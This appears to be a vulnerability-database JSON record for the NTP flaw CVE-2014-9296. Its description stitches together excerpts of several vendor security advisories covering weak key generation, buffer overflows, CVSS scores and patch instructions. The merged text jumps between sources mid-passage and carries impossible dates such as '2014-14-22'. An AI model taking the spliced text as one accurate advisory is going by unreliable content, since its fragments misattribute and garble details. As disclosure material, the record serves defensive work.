            "id": "CNNVD-201412-457",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2014-9296",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-9296"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-457"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9296"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The receive function in ntp_proto.c in ntpd in NTP before 4.2.8 continues to execute after detecting a certain authentication error, which might allow remote attackers to trigger an unintended association change via crafted packets. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Network Time Protocol is prone to an unspecified security vulnerability. \nLittle is known about this issue or its effects at this time. We will update this BID as more information emerges. \nNetwork Time Protocol 4.2.7 is vulnerable; other versions may also be affected. \nCorrected:      2014-14-22 19:07:16 UTC (stable/10, 10.1-STABLE)\n                2014-12-23 22:56:01 UTC (releng/10.1, 10.1-RELEASE-p3)\n                2014-12-23 22:55:14 UTC (releng/10.0, 10.0-RELEASE-p15)\n                2014-14-22 19:08:09 UTC (stable/9, 9.3-STABLE)\n                2014-12-23 22:54:25 UTC (releng/9.3, 9.3-RELEASE-p7)\n                2014-12-23 22:53:44 UTC (releng/9.2, 9.2-RELEASE-p17)\n                2014-12-23 22:53:03 UTC (releng/9.1, 9.1-RELEASE-p24)\n                2014-14-22 19:08:09 UTC (stable/8, 8.4-STABLE)\n                2014-12-23 22:52:22 UTC (releng/8.4, 8.4-RELEASE-p21)\nCVE Name:       CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. \n\nII.  [CVE-2014-9293]\nThe ntp-keygen(8) utility is also affected by a similar issue. \n[CVE-2014-9294]\n\nWhen Autokey Authentication is enabled, for example if ntp.conf(5) contains\na \u0027crypto pw\u0027 directive, a remote attacker can send a carefully\ncrafted packet that can overflow a stack buffer.  [CVE-2014-9296]\n\nIII. Impact\n\nThe NTP protocol uses keys to implement authentication.  The weak\nseeding of the pseudo-random number generator makes it easier for an\nattacker to brute-force keys, and thus may broadcast incorrect time stamps\nor masquerade as another time server. [CVE-2014-9295]\n\nIV.  Workaround\n\nNo workaround is available, but systems not running ntpd(8) are not\naffected.  Because the issue may lead to remote root compromise, the\nFreeBSD Security Team recommends system administrators to firewall NTP\nports, namely tcp/123 and udp/123 when it is not clear that all systems\nhave been patched or have ntpd(8) stopped. \n\nV. \n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch\n# fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch.asc\n# gpg --verify ntp.patch.asc\n\nb) Apply the patch.  Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart the ntpd(8) daemons, or reboot the system. \n\nVI.  Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path                                                      Revision\n- -------------------------------------------------------------------------\nstable/8/                                                         r276073\nreleng/8.4/                                                       r276154\nstable/9/                                                         r276073\nreleng/9.1/                                                       r276155\nreleng/9.2/                                                       r276156\nreleng/9.3/                                                       r276157\nstable/10/                                                        r276072\nreleng/10.0/                                                      r276158\nreleng/10.1/                                                      r276159\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. This situation may be exploitable by an attacker\n (CVE-2014-9296). \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296\n http://advisories.mageia.org/MGASA-2014-0541.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 25fe56fc0649ac9bb83be467969c2380  mbs1/x86_64/ntp-4.2.6p5-8.1.mbs1.x86_64.rpm\n 9409f5337bc2a2682e09db81e769cd5c  mbs1/x86_64/ntp-client-4.2.6p5-8.1.mbs1.x86_64.rpm\n df65cc9c536cdd461e1ef95318ab0d3b  mbs1/x86_64/ntp-doc-4.2.6p5-8.1.mbs1.x86_64.rpm \n 53f446bffdf6e87726a9772e946c5e34  mbs1/SRPMS/ntp-4.2.6p5-8.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\nRelease Date: 2015-02-18\nLast Updated: 2015-02-18\n\nPotential Security Impact: Remote execution of code, Denial of Service (DoS),\nor other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP-UX running\nNTP. These could be exploited remotely to execute code, create a Denial of\nService (DoS), or other vulnerabilities. \n\nReferences:\n\nCVE-2014-9293 - Insufficient Entropy in Pseudo-Random Number Generator (PRNG)\n(CWE-332)\nCVE-2014-9294 - Use of Cryptographically Weak PRNG (CWE-338)\nCVE-2014-9295 - Stack Buffer Overflow (CWE-121)\nCVE-2014-9296 - Error Conditions, Return Values, Status Codes (CWE-389)\nCVE-2014-9297 - Improper Check for Unusual or Exceptional Conditions\n(CWE-754)\nSSRT101872\nVU#852879\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP-UX B.11.31 running NTP version C.4.2.6.4.0 or previous\nHP-UX B.11.23 running XNTP version 3.5 or previous\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2014-9293    (AV:N/AC:L/Au:N/C:P/I:P/A:P)       7.5\nCVE-2014-9294    (AV:N/AC:L/Au:N/C:P/I:P/A:P)       7.5\nCVE-2014-9295    (AV:N/AC:L/Au:N/C:P/I:P/A:P)       7.5\nCVE-2014-9296    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\nCVE-2014-9297    (AV:N/AC:H/Au:N/C:P/I:N/A:N)       2.6\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following patch for HP-UX B.11.31. A workaround for HP-UX\nB.11.23 and B.11.11 to temporarily resolve these vulnerabilities follows\nbelow. \n\nThe B.11.31 patch is available from:\nftp://ntp42650:Secure12@h2.usa.hp.com or https://h20392.www2.hp.com/portal/sw\ndepot/displayProductInfo.do?productNumber=HPUX-NTP\n\nMitigation steps for HP-UX B.11.23 and B.11.11 for CVE-2014-9295\n\nRestrict query for server status (Time Service is not affected) from\nntpq/ntpdc by enabling .noquery. using the restrict command in /etc/ntp.conf\nfile. \n\nReference: http://support.ntp.org/bin/view/Main/SecurityNotice\n\nNOTE: This bulletin will be revised when patches for XNTP v3.5 on B.11.23 and\nB.11.11 become available. \n\nMANUAL ACTIONS: No\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.31\n==================\nNTP.INETSVCS2-BOOT\nNTP.NTP-AUX\nNTP.NTP-RUN\naction: install revision C.4.2.6.5.0 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 18 February 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: ntp security update\nAdvisory ID:       RHSA-2014:2024-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2014-2024.html\nIssue date:        2014-12-20\nCVE Names:         CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 \n                   CVE-2014-9296 \n=====================================================================\n\n1. Summary:\n\nUpdated ntp packages that fix several security issues are now available\nfor Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available from the CVE link in the\nReferences section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. \n\nMultiple buffer overflow flaws were discovered in ntpd\u0027s crypto_recv(),\nctl_putdata(), and configure() functions. Note: the crypto_recv() flaw requires non-default\nconfigurations to be active, while the ctl_putdata() flaw, by default, can\nonly be exploited via local attackers, and the configure() flaw requires\nadditional authentication to exploit. (CVE-2014-9295)\n\nIt was found that ntpd automatically generated weak keys for its internal\nuse if no ntpdc request authentication key was specified in the ntp.conf\nconfiguration file. A remote attacker able to match the configured IP\nrestrictions could guess the generated key, and possibly use it to send\nntpdc query or configuration requests. (CVE-2014-9293)\n\nIt was found that ntp-keygen used a weak method for generating MD5 keys. \nThis could possibly allow an attacker to guess generated MD5 keys that\ncould then be used to spoof an NTP client or server. Note: it is\nrecommended to regenerate any MD5 keys that had explicitly been generated\nwith ntp-keygen; the default installation does not contain such keys). \n(CVE-2014-9294)\n\nA missing return statement in the receive() function could potentially\nallow a remote attacker to bypass NTP\u0027s authentication mechanism. \n(CVE-2014-9296)\n\nAll ntp users are advised to upgrade to this updated package, which\ncontains backported patches to resolve these issues. After installing the\nupdate, the ntpd daemon will restart automatically. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at \nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1176032 - CVE-2014-9293 ntp: automatic generation of weak default key in config_auth()\n1176035 - CVE-2014-9294 ntp: ntp-keygen uses weak random number generator and seed when generating MD5 keys\n1176037 - CVE-2014-9295 ntp: Multiple buffer overflows via specially-crafted packets\n1176040 - CVE-2014-9296 ntp: receive() missing return on error\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nntp-4.2.6p5-2.el6_6.src.rpm\n\ni386:\nntp-4.2.6p5-2.el6_6.i686.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm\nntpdate-4.2.6p5-2.el6_6.i686.rpm\n\nx86_64:\nntp-4.2.6p5-2.el6_6.x86_64.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntpdate-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm\nntp-perl-4.2.6p5-2.el6_6.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-2.el6_6.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntp-perl-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nntp-4.2.6p5-2.el6_6.src.rpm\n\nx86_64:\nntp-4.2.6p5-2.el6_6.x86_64.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntpdate-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nnoarch:\nntp-doc-4.2.6p5-2.el6_6.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntp-perl-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nntp-4.2.6p5-2.el6_6.src.rpm\n\ni386:\nntp-4.2.6p5-2.el6_6.i686.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm\nntpdate-4.2.6p5-2.el6_6.i686.rpm\n\nppc64:\nntp-4.2.6p5-2.el6_6.ppc64.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.ppc64.rpm\nntpdate-4.2.6p5-2.el6_6.ppc64.rpm\n\ns390x:\nntp-4.2.6p5-2.el6_6.s390x.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.s390x.rpm\nntpdate-4.2.6p5-2.el6_6.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-2.el6_6.x86_64.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntpdate-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm\nntp-perl-4.2.6p5-2.el6_6.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-2.el6_6.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-2.el6_6.ppc64.rpm\nntp-perl-4.2.6p5-2.el6_6.ppc64.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-2.el6_6.s390x.rpm\nntp-perl-4.2.6p5-2.el6_6.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntp-perl-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nntp-4.2.6p5-2.el6_6.src.rpm\n\ni386:\nntp-4.2.6p5-2.el6_6.i686.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm\nntpdate-4.2.6p5-2.el6_6.i686.rpm\n\nx86_64:\nntp-4.2.6p5-2.el6_6.x86_64.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntpdate-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm\nntp-perl-4.2.6p5-2.el6_6.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-2.el6_6.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntp-perl-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nntp-4.2.6p5-19.el7_0.src.rpm\n\nx86_64:\nntp-4.2.6p5-19.el7_0.x86_64.rpm\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nntpdate-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.el7_0.noarch.rpm\nntp-perl-4.2.6p5-19.el7_0.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nsntp-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nntp-4.2.6p5-19.el7_0.src.rpm\n\nx86_64:\nntp-4.2.6p5-19.el7_0.x86_64.rpm\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nntpdate-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.el7_0.noarch.rpm\nntp-perl-4.2.6p5-19.el7_0.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nsntp-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nntp-4.2.6p5-19.el7_0.src.rpm\n\nppc64:\nntp-4.2.6p5-19.el7_0.ppc64.rpm\nntp-debuginfo-4.2.6p5-19.el7_0.ppc64.rpm\nntpdate-4.2.6p5-19.el7_0.ppc64.rpm\n\ns390x:\nntp-4.2.6p5-19.el7_0.s390x.rpm\nntp-debuginfo-4.2.6p5-19.el7_0.s390x.rpm\nntpdate-4.2.6p5-19.el7_0.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-19.el7_0.x86_64.rpm\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nntpdate-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.el7_0.noarch.rpm\nntp-perl-4.2.6p5-19.el7_0.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-19.el7_0.ppc64.rpm\nsntp-4.2.6p5-19.el7_0.ppc64.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-19.el7_0.s390x.rpm\nsntp-4.2.6p5-19.el7_0.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nsntp-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nntp-4.2.6p5-19.el7_0.src.rpm\n\nx86_64:\nntp-4.2.6p5-19.el7_0.x86_64.rpm\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nntpdate-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.el7_0.noarch.rpm\nntp-perl-4.2.6p5-19.el7_0.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nsntp-4.2.6p5-19.el7_0.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-9293\nhttps://access.redhat.com/security/cve/CVE-2014-9294\nhttps://access.redhat.com/security/cve/CVE-2014-9295\nhttps://access.redhat.com/security/cve/CVE-2014-9296\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUlOKcXlSAg2UNWIIRAvBoAKCfw+j4ua5JaIRMc5eKkny9G1yWlgCgufNc\nEvBImTd+Vq7//UExow1FP4U=\n=m/Eb\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nThe two patches are available from the HP Support Center (HPSC). \n\nReference: http://support.ntp.org/bin/view/Main/SecurityNotice\n\nMANUAL ACTIONS: Yes - Update\n\nIf patch installation on B.11.11 or B.11.23 is not possible, mitigate with\nstep above. \n\nOn December 19, 2014, NTP.org and US-CERT released security advisories detailing two issues regarding weak cryptographic pseudorandom number generation (PRNG), three buffer overflow vulnerabilities, and an unhandled error condition with an unknown impact. \n\nCisco will release free software updates that address these vulnerabilities.  Attackers could use this key to\n    reconfigure ntpd (or to exploit other vulnerabilities). \n\nThe default ntpd configuration in Debian restricts access to localhost\n(and possible the adjacent network in case of IPv6). \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1:4.2.6.p5+dfsg-2+deb7u1. \n\nWe recommend that you upgrade your ntp packages. \n\nReferences:\n\nCVE-2014-9293\nCVE-2014-9294\nCVE-2014-9295\nCVE-2014-9296\nCVE-2013-5211\nSSRT102239\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n  Platform\n   Patch Kit Name\n\n  Alpha IA64 V8.4\n   75-117-380_2015-08-24.BCK\n\n  NOTE: Please contact OpenVMS Technical Support to request these patch kits. ============================================================================\nUbuntu Security Notice USN-2449-1\nDecember 22, 2014\n\nntp vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. The default compiler options for affected releases should reduce the\nvulnerability to a denial of service. In addition, attackers would be\nisolated by the NTP AppArmor profile. (CVE-2014-9295)\n\nStephen Roettger discovered that NTP incorrectly continued processing when\nhandling certain errors. (CVE-2014-9296)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.10:\n  ntp                             1:4.2.6.p5+dfsg-3ubuntu2.14.10.1\n\nUbuntu 14.04 LTS:\n  ntp                             1:4.2.6.p5+dfsg-3ubuntu2.14.04.1\n\nUbuntu 12.04 LTS:\n  ntp                             1:4.2.6.p3+dfsg-1ubuntu3.2\n\nUbuntu 10.04 LTS:\n  ntp                             1:4.2.4p8+dfsg-1ubuntu2.2\n\nAfter a standard system update you need to regenerate any MD5 keys that\nwere manually created with ntp-keygen. The net-misc/ntp package contains the official reference\nimplementation by the NTP Project. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/ntp                 \u003c 4.2.8                    \u003e= 4.2.8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-9293\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9293\n[ 2 ] CVE-2014-9294\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9294\n[ 3 ] CVE-2014-9295\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9295\n[ 4 ] CVE-2014-9296\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9296\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-34.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-9296"
      },
      {
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "db": "BID",
        "id": "71758"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-9296"
      },
      {
        "db": "PACKETSTORM",
        "id": "129716"
      },
      {
        "db": "PACKETSTORM",
        "id": "129793"
      },
      {
        "db": "PACKETSTORM",
        "id": "130481"
      },
      {
        "db": "PACKETSTORM",
        "id": "129686"
      },
      {
        "db": "PACKETSTORM",
        "id": "131356"
      },
      {
        "db": "PACKETSTORM",
        "id": "129711"
      },
      {
        "db": "PACKETSTORM",
        "id": "129680"
      },
      {
        "db": "PACKETSTORM",
        "id": "133517"
      },
      {
        "db": "PACKETSTORM",
        "id": "129684"
      },
      {
        "db": "PACKETSTORM",
        "id": "129723"
      }
    ],
    "trust": 2.88
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-9296",
        "trust": 3.0
      },
      {
        "db": "CERT/CC",
        "id": "VU#852879",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "71758",
        "trust": 2.0
      },
      {
        "db": "SECUNIA",
        "id": "62209",
        "trust": 1.7
      },
      {
        "db": "MCAFEE",
        "id": "SB10103",
        "trust": 1.7
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-14-353-01",
        "trust": 1.1
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-457",
        "trust": 0.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-14-353-01A",
        "trust": 0.3
      },
      {
        "db": "JUNIPER",
        "id": "JSA10663",
        "trust": 0.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-14-353-01C",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-9296",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129716",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129793",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130481",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129686",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "131356",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129711",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129680",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "133517",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129684",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129723",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-9296"
      },
      {
        "db": "BID",
        "id": "71758"
      },
      {
